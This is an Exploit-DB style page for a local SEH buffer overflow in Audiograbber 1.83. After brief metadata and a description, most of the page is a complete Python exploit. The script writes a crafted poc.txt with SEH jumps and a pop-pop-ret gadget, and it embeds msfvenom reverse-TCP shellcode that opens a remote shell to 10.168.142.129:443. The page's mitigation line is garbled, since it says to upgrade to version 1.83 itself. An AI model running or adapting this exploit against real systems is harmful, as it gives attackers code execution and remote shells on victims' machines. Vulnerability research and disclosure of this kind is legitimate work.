Audiograbber 1.83 - Local Buffer Overflow (SEH)

vendor:

Audiograbber

by:

Dennis 'dhn' Herrmann

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Audiograbber

Affected Version From: 1.83

Affected Version To: 1.83

Patch Exists: YES

Related CWE: N/A

CPE: a:audiograbber:audiograbber:1.83

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 SP1 (x86)

2018

Audiograbber 1.83 – Local Buffer Overflow (SEH)

Audiograbber 1.83 is vulnerable to a local buffer overflow vulnerability. An attacker can exploit this vulnerability by crafting a malicious file and convincing the user to open it. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of Audiograbber 1.83

Source

Exploit-DB raw data:

# Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH)
# Date: 2018-06-16
# Exploit Author: Dennis 'dhn' Herrmann
# Vendor Homepage: https://www.audiograbber.org/
# Version: 1.83
# Tested on: Windows 7 SP1 (x86)

#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
#
# Tested with Windows 7 SP1 (x86)
# Steps:
#  - Paste "poc.txt" content in the "Interpret" or "Album" field

class Exploit:

    def __init__(self, shellcode):
        self._shellcode = shellcode
        self._payload = None

    def __write(self):
        f = open("poc.txt", "w")
        f.write(self._payload)
        f.close()

    def run(self):
        pattern = "A" * 256
        jmp_short = "\xeb\x08\x90\x90"  # short JMP
        pop2ret = "\x79\x91\x01\x10"    # WMA8Connect.dll

        self._payload = pattern
        self._payload += jmp_short
        self._payload += pop2ret

        # The buffer is mangled so we have to jump
        # over the parts to reached our shellcode
        self._payload += "\x90" * 18 + jmp_short
        self._payload += "\x90" * 28 + jmp_short
        self._payload += "\x90" * 32 + self._shellcode 

        self.__write()

def main():
    # msfvenom --platform windows -p windows/shell_reverse_tcp \
    #       LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" \
    #       -e x86/alpha_mixed -f py
    shellcode = (
        "\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51"
        "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
        "\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
        "\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77"
        "\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61"
        "\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50"
        "\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32"
        "\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b"
        "\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c"
        "\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b"
        "\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50"
        "\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32"
        "\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b"
        "\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47"
        "\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b"
        "\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78"
        "\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75"
        "\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71"
        "\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34"
        "\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e"
        "\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74"
        "\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45"
        "\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61"
        "\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64"
        "\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42"
        "\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33"
        "\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47"
        "\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47"
        "\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79"
        "\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56"
        "\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70"
        "\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a"
        "\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48"
        "\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f"
        "\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37"
        "\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68"
        "\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e"
        "\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c"
        "\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d"
        "\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46"
        "\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76"
        "\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37"
        "\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30"
        "\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51"
        "\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36"
        "\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f"
        "\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36"
        "\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67"
        "\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65"
        "\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d"
        "\x4d\x59\x6f\x59\x45\x75\x6c\x53\x36\x31\x6c\x47\x7a"
        "\x6d\x50\x49\x6b\x79\x70\x70\x75\x36\x65\x6f\x4b\x77"
        "\x37\x62\x33\x61\x62\x70\x6f\x71\x7a\x45\x50\x61\x43"
        "\x6b\x4f\x69\x45\x41\x41"
     )

    exploit = Exploit(shellcode)
    exploit.run()


if __name__ == "__main__":
    main()